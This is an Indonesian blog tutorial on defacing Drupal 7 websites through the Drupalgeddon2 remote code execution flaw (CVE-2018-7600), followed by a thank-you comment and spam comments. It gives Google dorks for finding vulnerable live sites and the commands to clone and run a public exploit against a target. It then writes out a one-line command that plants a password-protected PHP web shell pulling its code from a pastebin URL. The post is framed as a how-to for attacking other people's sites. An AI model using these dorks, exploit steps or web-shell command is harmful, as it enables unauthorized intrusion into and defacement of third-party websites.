Deface Drupal RCE - Ryangueltoem

Ryangueltoem

Kumpulan Berbagai TUTORIAL yang ada di Internet.

Breaking

Post Top Ad

All Tutor Cyber

Friday, May 18, 2018

Deface Drupal RCE


Tag :
- Deface Drupal RCE
- Drupalgeddon2
- Exploit drupalgeddon2
- Instal drupalgeddon2
- Instal drupalgeddon2 in Termux


Sedikit cerita mengenai Drupalgeddon2 :
Exsploitasi Drupalgeddon2 Dimulai setelah proof-of-concept Dipublikasi. Kode yang dihosting di GitHub, dibuat oleh Vitalii Rudnykh, seorang peneliti keamanan Rusia. Kode ini didasarkan pada rincian kerentanan Drupalgeddon2 yang diterbitkan oleh Check Point dan Dofinity.
Kerentanan ( CVE-2018-7600 ) memungkinkan penyerang untuk menjalankan kode apa pun yang diinginkannya terhadap salah satu komponen inti CMS, yang secara efektif mengambil alih sebuah situs.

Langsung saja ke Tutorialnya :

Bahan persiapan :
1. Linux / Termux ( yang ingin menjalankan di os windows harus mengistal ruby terlebih dahulu )
2. Shell :
echo '<?php eval("?>".file_get_contents("https://pastebin.com/raw/uTnyQv5n"));?>' > namashell.php
     Password shellnya : alltutorcyber
3. Dork :  "alltutorcyber" inurl:/?q=node/ "powered by drupal"
    ( Kembangi lagi dorknya, "alltutorcyber" bisa diganti dengan kata kata yang publik )

Cara Menginstal drupalgeddon2 :
> pkg install git
> gem install ruby
> git clone https://github.com/dreadlocked/Drupalgeddon2
Cara Menjalankannya :
> cd Drupalgeddon2
> ruby drupalgeddon2.rb http://sitetarget.co.li/

 1. Pertama tama dorking dulu "casino" inurl:/?q=node/ "powered by drupal" ke google pencarian


2. Pilih salah satu web target
3. Untuk mencheck versi Drupalnya tambahkan /CHANGELOG.txt pada link web target.

exploit drupalgeddon2 hanya bisa pada versi 7.x.x . Jika menemukan versi 6 / 8 tinggalin aja

4. Masukkan ke exploitnya lalu jalankan



5. Jika muncul "Fake Shell" masukkan perintah uname -a


6. Nahh.. Jika muncul nama servernya berarti vuln untuk upload shell. Masukkan perintah echo '<?php eval("?>".file_get_contents("https://pastebin.com/raw/uTnyQv5n"));?>' > namashell.php



7. Jika sudah begini berarti kita sudah sukses mengupload shellnya. tinggal buka web target dan tambahin nama shell yang kalian upload tadi /namashell.php


Mudah bukan? :v
Itu adalah target yang saya coba menggunakan exploit drupalgeddon2. Password shellnya adalah "alltutorcyber"


Sekianlah Postingan Dari All Tutor Cyber tentang "Deface Drupal RCE" Semoga Bisa Bermanfaat!



Anda Sekarang Sedang Membaca Postingan "Deface Drupal RCE" Dengan URL https://www.alltutorcyber.me/2018/05/deface-drupalgeddon2-rce.html
Jika Ada Content Yang Rusak, Atau Kurang dapat dipahami silahkan komentar di bawah Postingan atau anda juga bisa menghubungi kami pada bagian Contact Us.

5 comments:

  1. ooh gitu gan caranya deface dryoakgeddon, makasih ya

    ReplyDelete
  2. Congo was naturally mortified that this had happened, as I’d left a good paying job to come work there. But sometimes this just happens, so you have to roll with the punches. Anyway, on our last day of work at Government News, while all the computers, and chairs and servers and printers were being packed up for review of Customessaymeister , to be shipped to the new owners head office in Surry Hills (we were in Frenchs Forrest), Congo walked in holding a big, expensive framed print that had hung in the CEO’s office, and that I had often commented on.

    ReplyDelete
  3. Want To Increase Your ClickBank Commissions And Traffic?

    Bannerizer made it easy for you to promote ClickBank products using banners, simply go to Bannerizer, and grab the banner codes for your selected ClickBank products or use the Universal ClickBank Banner Rotator Tool to promote all of the available ClickBank products.

    ReplyDelete